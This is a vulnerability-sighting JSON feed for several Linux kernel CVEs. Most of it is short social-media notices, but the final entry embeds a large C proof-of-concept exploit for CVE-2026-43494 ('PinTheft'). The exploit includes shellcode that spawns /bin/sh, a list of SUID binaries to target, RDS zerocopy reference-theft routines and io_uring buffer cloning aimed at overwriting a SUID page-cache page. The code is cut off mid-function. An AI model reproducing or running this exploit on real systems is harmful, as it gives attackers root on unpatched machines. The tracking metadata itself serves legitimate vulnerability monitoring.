{"vulnerability": "cve-2026-4349", "sightings": [{"uuid": "bc96d369-8733-40f5-b137-05c9ccb30669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43492", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mm7fua4css2n", "content": "CVE-2026-43492 - lib/crypto: mpi: Fix integer underflow in mpi_read_raw_from_sgl()\nCVE ID : CVE-2026-43492\n \n Published : May 19, 2026, 10:44 a.m. | 1\u00a0hour, 29\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nlib/crypto: mpi: Fi...", "creation_timestamp": "2026-05-19T12:38:23.318754Z"}, {"uuid": "038ba432-f814-4c2c-829c-f28d2dde5041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mm7g7vuom52t", "content": "CVE-2026-43493 - crypto: pcrypt - Fix handling of MAY_BACKLOG requests\nCVE ID : CVE-2026-43493\n \n Published : May 19, 2026, 10:44 a.m. | 1\u00a0hour, 29\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: pcrypt - Fix handling o...", "creation_timestamp": "2026-05-19T12:44:55.006948Z"}, {"uuid": "803287cd-8a3c-442e-a759-92ecba624338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mm7gkp7sn32c", "content": "CVE-2026-43491 - net: qrtr: ns: Limit the maximum server registration per node\nCVE ID : CVE-2026-43491\n \n Published : May 19, 2026, 10:44 a.m. | 1\u00a0hour, 29\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qrtr: ns: Limit th...", "creation_timestamp": "2026-05-19T12:50:57.211490Z"}, {"uuid": "868078f1-1fad-40a2-9055-b9104d0214fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmehrqrwq72k", "content": "CVE-2026-43494 - net/rds: reset op_nents when zerocopy page pin fails\nCVE ID : CVE-2026-43494\n \n Published : May 21, 2026, 10:49 a.m. | 1\u00a0hour, 28\u00a0minutes ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nnet/rds: reset op_nents when zer...", "creation_timestamp": "2026-05-21T12:56:06.973107Z"}, {"uuid": "2ed98e30-7353-42de-8ae0-7e74402c729d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmerpmotx72i", "content": "CVE-2026-43495 - net: wwan: t7xx: validate port_count against message length in t7xx_port_enum_msg_handler\nCVE ID : CVE-2026-43495\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:...", "creation_timestamp": "2026-05-21T15:53:52.211288Z"}, {"uuid": "1ca3fc88-83e6-41ef-9ff6-e9a5c3d7438b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmerscvff72i", "content": "CVE-2026-43499 - rtmutex: Use waiter::task instead of current in remove_waiter()\nCVE ID : CVE-2026-43499\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nrtmutex: Use waiter::tas...", "creation_timestamp": "2026-05-21T15:55:22.604213Z"}, {"uuid": "243dc70f-c5cf-4529-a00a-1166639d9cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43498", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmescc66og2q", "content": "CVE-2026-43498 - accel/ivpu: Disallow re-exporting imported GEM objects\nCVE ID : CVE-2026-43498\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\naccel/ivpu: Disallow re-exporting...", "creation_timestamp": "2026-05-21T16:04:18.533821Z"}, {"uuid": "a20f18e1-c4cc-4488-b1d8-c274fd12faf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43497", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmesyzrc762t", "content": "CVE-2026-43497 - fbdev: udlfb: add vm_ops to dlfb_ops_mmap to prevent use-after-free\nCVE ID : CVE-2026-43497\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: udlfb: add vm...", "creation_timestamp": "2026-05-21T16:17:01.577996Z"}, {"uuid": "78d9d595-b529-4fbb-bab6-5ae321ca8657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43496", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mmetnfmrzt2k", "content": "CVE-2026-43496 - net/sched: sch_red: Replace direct dequeue call with peek and qdisc_dequeue_peeked\nCVE ID : CVE-2026-43496\n \n Published : May 21, 2026, 1:16 p.m. | 1\u00a0hour, 1\u00a0minute ago\n \n Description : In the Linux kernel, the following vulnerability has been resolved:\n\nnet/s...", "creation_timestamp": "2026-05-21T16:28:25.209780Z"}, {"uuid": "41ce93e6-7cae-4846-829c-bc82a64f8ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43498", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116614473444295314", "content": "A severe vulnerability was disclosed for Linux Kernel (CVE-2026-43498) https://vuldb.com/vuln/365013", "creation_timestamp": "2026-05-21T20:34:12.583503Z"}, {"uuid": "0e5492f1-db9a-4e20-ae68-42532e1c8eed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116616573200856013", "content": "A lot of offensive activities were identified targeting Linux Kernel (CVE-2026-43495) https://vuldb.com/vuln/365011/cti", "creation_timestamp": "2026-05-22T05:29:42.029043Z"}, {"uuid": "4cb8320d-12c2-4c5d-ab91-39cb61f1705d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43498", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116617023069726248", "content": "Attention, elevated activities detected targeting Linux Kernel (CVE-2026-43498) https://vuldb.com/vuln/365013/cti", "creation_timestamp": "2026-05-22T07:22:36.618917Z"}, {"uuid": "da1191aa-2f98-4bb1-bf2b-2aeb092fd4a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mmgiweecrly2", "content": "Daniel Baumann: Debian: Linux Vulnerability Mitigation (PinTheft) Following the series of various Linux exploits of the last three weeks, the bug of today is PinTheft [ CVE-2026-43494 ] which is lo...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-22T08:21:59.412601Z"}, {"uuid": "6a6b3389-468d-4fbc-b2db-87c6ad0fbb78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43490", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmgyri3mmq2x", "content": "\ud83d\udd17 CVE : CVE-2026-31499, CVE-2026-43088, CVE-2026-43109, CVE-2026-43220, CVE-2026-43490, CVE-2026-46333", "creation_timestamp": "2026-05-22T13:05:30.840313Z"}, {"uuid": "472f092d-e4e3-42e1-9c07-647ba7be922b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://t.me/GithubRedTeam/85794", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43494-PinTheft-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jayhutajulu1\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 2  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-25 07:56:45\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nProof-of-concept for CVE-2026-43494 (PinTheft): Linux LPE via RDS zerocopy refcount bug + io_uring fixed buffers \u2192 SUID page-cache overwrite. Authorized research only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-25T08:00:04.000000Z"}, {"uuid": "e5e6c6e3-5059-42db-aad7-7836ed1cd533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "Telegram/-Rw1GdqgLbdPMkOwlVEIvz70NMtSIs0WWvrIrO5vIfavaPE", "content": "", "creation_timestamp": "2026-05-25T11:00:08.000000Z"}, {"uuid": "ab5f2ec0-a6c4-419c-9ac8-288bcb5c2432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://gist.github.com/spynika/bd10e4ce05b02731dc6266b8ce21160b", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef IORING_REGISTER_CLONE_BUFFERS\n#define IORING_REGISTER_CLONE_BUFFERS 19\n#endif\n\nstruct io_uring_clone_buffers {\n    __u32 src_fd;\n    __u32 flags;\n    __u32 src_off;\n    __u32 dst_off;\n    __u32 nr;\n    __u32 pad[3];\n};\n\n#define PAGE_SIZE 4096\n#define GUP_PIN_COUNTING_BIAS 1024\n#define PORT_BASE 20000\n#define MAX_RETRIES 5\n\nstatic const uint8_t SHELL_ELF[129] = {\n    0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n    0x03,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n    0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n    0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,\n    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n    0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n    0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0xb0,0x69,0x0f,0x05,0x48,0x8d,\n    0x3d,0xdb,0xff,0xff,0xff,0x6a,0x00,0x57,0x48,0x89,0xe6,0x31,0xd2,0xb0,0x3b,0x0f,\n    0x05,\n};\n\nstatic const char *suid_candidates[] = {\n    \"/usr/bin/su\", \"/bin/su\", \"/usr/bin/mount\", \"/usr/bin/passwd\",\n    \"/usr/bin/chsh\", \"/usr/bin/newgrp\", \"/usr/bin/umount\", \"/usr/bin/pkexec\", NULL\n};\n\n#define ANSI_RESET   \"\\033[0m\"\n#define ANSI_DIM     \"\\033[2m\"\n#define ANSI_BOLD    \"\\033[1m\"\n#define ANSI_RED     \"\\033[38;5;196m\"\n#define ANSI_GREEN   \"\\033[38;5;46m\"\n#define ANSI_CYAN    \"\\033[38;5;51m\"\n#define ANSI_YELLOW  \"\\033[38;5;226m\"\n#define ANSI_MAGENTA \"\\033[38;5;201m\"\n#define ANSI_ORANGE  \"\\033[38;5;208m\"\n#define ANSI_WHITE   \"\\033[38;5;255m\"\n#define ANSI_GRAY    \"\\033[38;5;245m\"\n#define ANSI_PURPLE  \"\\033[38;5;99m\"\n\n#define LOG(fmt, ...)  ui_log(fmt, ##__VA_ARGS__)\n#define ERR(fmt, ...)  ui_err(fmt, ##__VA_ARGS__)\n#define OK(fmt, ...)   ui_ok(fmt, ##__VA_ARGS__)\n\nstatic int g_phase = 0;\n\nstatic void ui_line(void) {\n    fprintf(stderr,\n        ANSI_GRAY \"  \u2570\" ANSI_PURPLE \"\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\" ANSI_RESET \"\\n\");\n}\n\nstatic void ui_banner(void) {\n    fprintf(stderr, \"\\n\");\n    fprintf(stderr, ANSI_MAGENTA\n        \"     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557   \u2588\u2588\u2557\\n\"\n        \"     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\\n\"\n        \"     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551     \u2588\u2588\u2588\u2588\u2588\u2557   \u255a\u2588\u2588\u2588\u2588\u2554\u255d \\n\"\n        \"     \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551     \u2588\u2588\u2554\u2550\u2550\u255d    \u255a\u2588\u2588\u2554\u255d  \\n\"\n        \"     \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557   \u2588\u2588\u2551   \\n\"\n        \"     \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d   \u255a\u2550\u255d   \\n\"\n        ANSI_RESET);\n    fprintf(stderr,\n        ANSI_PURPLE \"  \u250c\u2500\" ANSI_RESET\n        ANSI_BOLD ANSI_WHITE \" PinTheft \" ANSI_RESET\n        ANSI_DIM \"\u00b7\" ANSI_RESET \" \"\n        ANSI_CYAN \"CVE-2026-43494\" ANSI_RESET\n        ANSI_PURPLE \" \u2500 io_uring GUP pin theft \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n\"\n        ANSI_RESET);\n    fprintf(stderr,\n        ANSI_PURPLE \"  \u2502\" ANSI_RESET \" \"\n        ANSI_GRAY \"kernel local privilege escalation PoC\" ANSI_RESET\n        \"                          \"\n        ANSI_PURPLE \"\u2502\\n\"\n        ANSI_RESET);\n    fprintf(stderr,\n        ANSI_PURPLE \"  \u2514\" ANSI_GRAY \"\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\" ANSI_RESET\n        ANSI_PURPLE \"\u2518\\n\\n\"\n        ANSI_RESET);\n}\n\nstatic void ui_phase(const char *title) {\n    g_phase++;\n    fprintf(stderr, \"\\n\");\n    fprintf(stderr,\n        ANSI_ORANGE \"  \u25b6 \" ANSI_BOLD \"PHASE %d\" ANSI_RESET\n        ANSI_GRAY \" \u2502 \" ANSI_RESET\n        ANSI_WHITE \"%s\" ANSI_RESET \"\\n\",\n        g_phase, title);\n    ui_line();\n}\n\nstatic void ui_log(const char *fmt, ...) {\n    va_list ap;\n    fprintf(stderr, ANSI_CYAN \"  \u25c7 \" ANSI_RESET);\n    va_start(ap, fmt);\n    vfprintf(stderr, fmt, ap);\n    va_end(ap);\n    fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_ok(const char *fmt, ...) {\n    va_list ap;\n    fprintf(stderr, ANSI_GREEN \"  \u2713 \" ANSI_RESET);\n    va_start(ap, fmt);\n    vfprintf(stderr, fmt, ap);\n    va_end(ap);\n    fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_err(const char *fmt, ...) {\n    va_list ap;\n    fprintf(stderr, ANSI_RED \"  \u2717 \" ANSI_RESET);\n    va_start(ap, fmt);\n    vfprintf(stderr, fmt, ap);\n    va_end(ap);\n    fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_progress(int cur, int total) {\n    const int width = 32;\n    int filled = total ? (cur * width) / total : 0;\n    if (filled &gt; width) filled = width;\n\n    fprintf(stderr, \"\\r\" ANSI_GRAY \"  \u2502 \" ANSI_RESET);\n    fprintf(stderr, ANSI_PURPLE \"[\");\n    for (int i = 0; i &lt; width; i++)\n        fprintf(stderr, i &lt; filled ? ANSI_MAGENTA \"\u2588\" : ANSI_GRAY \"\u2591\");\n    fprintf(stderr, ANSI_PURPLE \"]\" ANSI_RESET);\n    fprintf(stderr, \" \" ANSI_WHITE \"%3d%%\" ANSI_RESET, total ? (cur * 100) / total : 0);\n    fprintf(stderr, ANSI_GRAY \" (%d/%d)\" ANSI_RESET, cur, total);\n    if (cur &gt;= total)\n        fprintf(stderr, \"\\n\");\n    fflush(stderr);\n}\n\nstatic void ui_stat_box(const char *label, const char *value, const char *color) {\n    fprintf(stderr,\n        ANSI_PURPLE \"  \u2502 \" ANSI_RESET\n        \"%-18s\" ANSI_GRAY \" \u2192 \" ANSI_RESET\n        \"%s%s%s\\n\",\n        label, color, value, ANSI_RESET);\n}\n\nstatic void ui_footer(int success) {\n    fprintf(stderr, \"\\n\");\n    if (success) {\n        fprintf(stderr,\n            ANSI_GREEN\n            \"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\"\n            \"  \u2551  \" ANSI_BOLD \"CHAIN COMPLETE\" ANSI_RESET ANSI_GREEN\n            \"  \u00b7  spawning privileged context...              \u2551\\n\"\n            \"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\"\n            ANSI_RESET);\n    } else {\n        fprintf(stderr,\n            ANSI_RED\n            \"  \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\"\n            \"  \u2551  \" ANSI_BOLD \"ABORTED\" ANSI_RESET ANSI_RED\n            \"  \u00b7  exploit chain did not finish                         \u2551\\n\"\n            \"  \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\"\n            ANSI_RESET);\n    }\n}\n\nstatic void pin_cpu(int cpu) {\n    cpu_set_t set;\n    CPU_ZERO(&amp;set);\n    CPU_SET(cpu, &amp;set);\n    if (sched_setaffinity(0, sizeof(set), &amp;set) &lt; 0) {\n        ERR(\"sched_setaffinity: %s\", strerror(errno));\n        exit(1);\n    }\n}\n\nstatic const char *find_suid_target(void) {\n    for (int i = 0; suid_candidates[i]; i++) {\n        struct stat st;\n        if (stat(suid_candidates[i], &amp;st) == 0 &amp;&amp; (st.st_mode &amp; S_ISUID)) {\n            OK(\"Found SUID: %s\", suid_candidates[i]);\n            return suid_candidates[i];\n        }\n    }\n    return NULL;\n}\n\nstatic int backup_target(const char *path) {\n    const char *name = strrchr(path, '/');\n    name = name ? name + 1 : path;\n    char backup[256];\n    snprintf(backup, sizeof(backup), \"/tmp/.backup_%s_%d\", name, getpid());\n    LOG(\"Backing up %s \u2192 %s\", path, backup);\n\n    int src = open(path, O_RDONLY);\n    if (src &lt; 0) {\n        ERR(\"open src: %s\", strerror(errno));\n        return -1;\n    }\n    int dst = open(backup, O_WRONLY | O_CREAT | O_TRUNC, 0755);\n    if (dst &lt; 0) {\n        ERR(\"open dst: %s\", strerror(errno));\n        close(src);\n        return -1;\n    }\n\n    char tmp[4096];\n    ssize_t n;\n    while ((n = read(src, tmp, sizeof(tmp))) &gt; 0) {\n        if (write(dst, tmp, n) != n) {\n            ERR(\"write backup: %s\", strerror(errno));\n            close(src);\n            close(dst);\n            return -1;\n        }\n    }\n    close(src);\n    close(dst);\n    OK(\"Backup: %s\", backup);\n    return 0;\n}\n\nstatic int steal_one_ref(void *page_addr, int port) {\n    int fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\n    if (fd &lt; 0) return -1;\n\n    int v = 1;\n    setsockopt(fd, SOL_SOCKET, SO_ZEROCOPY, &amp;v, sizeof(v));\n    int sndbuf = 2 * 4096 * 4;\n    setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &amp;sndbuf, sizeof(sndbuf));\n    v = 2;\n    setsockopt(fd, SOL_RDS, SO_RDS_TRANSPORT, &amp;v, sizeof(v));\n\n    struct sockaddr_in a = {\n        .sin_family = AF_INET,\n        .sin_addr.s_addr = htonl(INADDR_LOOPBACK),\n        .sin_port = htons(port),\n    };\n    if (bind(fd, (struct sockaddr *)&amp;a, sizeof(a)) &lt; 0) {\n        close(fd);\n        return -1;\n    }\n\n    a.sin_port = htons(port + 1);\n    struct iovec iov = { page_addr, 2 * PAGE_SIZE };\n\n    char cb[CMSG_SPACE(sizeof(uint32_t))];\n    memset(cb, 0, sizeof(cb));\n    struct cmsghdr *cm = (struct cmsghdr *)cb;\n    cm-&gt;cmsg_level = SOL_RDS;\n    cm-&gt;cmsg_type = RDS_CMSG_ZCOPY_COOKIE;\n    cm-&gt;cmsg_len = CMSG_LEN(sizeof(uint32_t));\n\n    struct msghdr m = {\n        .msg_name = &amp;a,\n        .msg_namelen = sizeof(a),\n        .msg_iov = &amp;iov,\n        .msg_iovlen = 1,\n        .msg_control = cb,\n        .msg_controllen = sizeof(cb),\n    };\n    sendmsg(fd, &amp;m, MSG_ZEROCOPY | MSG_DONTWAIT);\n    close(fd);\n    return 0;\n}\n\nstruct uring {\n    int fd;\n    void *sq_ring, *cq_ring;\n    struct io_uring_sqe *sqes;\n    uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array;\n    uint32_t *cq_head, *cq_tail, *cq_mask;\n    struct io_uring_cqe *cqes;\n    size_t sq_ring_sz, cq_ring_sz, sqes_sz;\n};\n\nstatic int uring_setup(struct uring *r, unsigned entries) {\n    struct io_uring_params p;\n    memset(&amp;p, 0, sizeof(p));\n\n    r-&gt;fd = syscall(__NR_io_uring_setup, entries, &amp;p);\n    if (r-&gt;fd &lt; 0) {\n        ERR(\"io_uring_setup: %s\", strerror(errno));\n        return -1;\n    }\n\n    r-&gt;sq_ring_sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t);\n    r-&gt;cq_ring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);\n    r-&gt;sqes_sz = p.sq_entries * sizeof(struct io_uring_sqe);\n\n    r-&gt;sq_ring = mmap(NULL, r-&gt;sq_ring_sz, PROT_READ | PROT_WRITE,\n                      MAP_SHARED | MAP_POPULATE, r-&gt;fd, IORING_OFF_SQ_RING);\n    if (r-&gt;sq_ring == MAP_FAILED) {\n        ERR(\"mmap sq_ring: %s\", strerror(errno));\n        return -1;\n    }\n\n    r-&gt;cq_ring = mmap(NULL, r-&gt;cq_ring_sz, PROT_READ | PROT_WRITE,\n                      MAP_SHARED | MAP_POPULATE, r-&gt;fd, IORING_OFF_CQ_RING);\n    if (r-&gt;cq_ring == MAP_FAILED) {\n        ERR(\"mmap cq_ring: %s\", strerror(errno));\n        return -1;\n    }\n\n    r-&gt;sqes = mmap(NULL, r-&gt;sqes_sz, PROT_READ | PROT_WRITE,\n                   MAP_SHARED | MAP_POPULATE, r-&gt;fd, IORING_OFF_SQES);\n    if (r-&gt;sqes == MAP_FAILED) {\n        ERR(\"mmap sqes: %s\", strerror(errno));\n        return -1;\n    }\n\n    r-&gt;sq_head  = (uint32_t *)((char *)r-&gt;sq_ring + p.sq_off.head);\n    r-&gt;sq_tail  = (uint32_t *)((char *)r-&gt;sq_ring + p.sq_off.tail);\n    r-&gt;sq_mask  = (uint32_t *)((char *)r-&gt;sq_ring + p.sq_off.ring_mask);\n    r-&gt;sq_array = (uint32_t *)((char *)r-&gt;sq_ring + p.sq_off.array);\n    r-&gt;cq_head  = (uint32_t *)((char *)r-&gt;cq_ring + p.cq_off.head);\n    r-&gt;cq_tail  = (uint32_t *)((char *)r-&gt;cq_ring + p.cq_off.tail);\n    r-&gt;cq_mask  = (uint32_t *)((char *)r-&gt;cq_ring + p.cq_off.ring_mask);\n    r-&gt;cqes     = (struct io_uring_cqe *)((char *)r-&gt;cq_ring + p.cq_off.cqes);\n    return 0;\n}\n\nstatic int uring_register_buffers(struct uring *r, void *buf, size_t len) {\n    struct iovec iov = { .iov_base = buf, .iov_len = len };\n    int ret = syscall(__NR_io_uring_register, r-&gt;fd,\n                      IORING_REGISTER_BUFFERS, &amp;iov, 1);\n    if (ret &lt; 0) {\n        ERR(\"io_uring_register buffers: %s\", strerror(errno));\n        return -1;\n    }\n    return 0;\n}\n\nstatic int uring_clone_buffers(struct uring *dst, struct uring *src) {\n    struct io_uring_clone_buffers arg;\n    memset(&amp;arg, 0, sizeof(arg));\n    arg.src_fd = src-&gt;fd;\n    int ret = syscall(__NR_io_uring_register, dst-&gt;fd,\n                      IORING_REGISTER_CLONE_BUFFERS, &amp;arg, 1);\n    if (ret &lt; 0) {\n        ERR(\"io_uring_clone_buffers: %s\", strerror(errno));\n        return -1;\n    }\n    return 0;\n}\n\nstatic pid_t spawn_ring_holder(int ring2_fd) {\n    pid_t pid = fork();\n    if (pid != 0) return pid;\n    fcntl(ring2_fd, F_SETFD, 0);\n    for (int fd = 0; fd &lt; 1024; fd++)\n        if (fd != ring2_fd) close(fd);\n    